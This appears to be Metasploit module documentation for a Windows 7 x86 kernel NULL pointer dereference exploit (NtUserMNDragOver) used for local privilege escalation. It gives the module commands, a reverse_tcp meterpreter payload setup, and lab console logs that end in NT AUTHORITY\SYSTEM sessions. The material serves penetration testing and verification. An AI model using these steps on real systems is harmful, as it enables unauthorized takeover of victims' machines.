## Vulnerable Application

This module exploits a NULL pointer dereference vulnerability in
MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system
call.

The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()
function does not effectively check the validity of the tagPOPUPMENU
objects it processes before passing them on to MNGetpItemFromIndex(),
where the NULL pointer dereference will occur.

This module has been tested against Windows 7 x86 SP0 and SP1.
Offsets within the solution may need to be adjusted to work with
other versions of Windows, such as Windows Server 2008.

## Verification Steps

1. Get a non-SYSTEM meterpreter session on Windows 7 x86
1. `use exploit/windows/local/ntusermndragover`
1. `set session <session>`
1. `set payload windows/meterpreter/reverse_tcp`
1. `set LHOST <LHOST>`
1. `set LPORT 5555`
1. `exploit`
1. Get a SYSTEM session

## Scenarios

### Windows 7 SP0 x86

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)

msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run

[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Reflectively injecting the exploit DLL and running the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 192.168.56.15
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800

meterpreter > sysinfo
Computer        : USER-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

### Windows 7 SP1 x86

```

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)

msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run

[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 2696 launched.
[*] Injecting exploit into 2696 ...
[*] Exploit injected. Injecting payload into 2696...
[*] Payload injected. Executing exploit...
[*] Sending stage (176195 bytes) to 192.168.56.5
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800

meterpreter > sysinfo
Computer        : USER-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
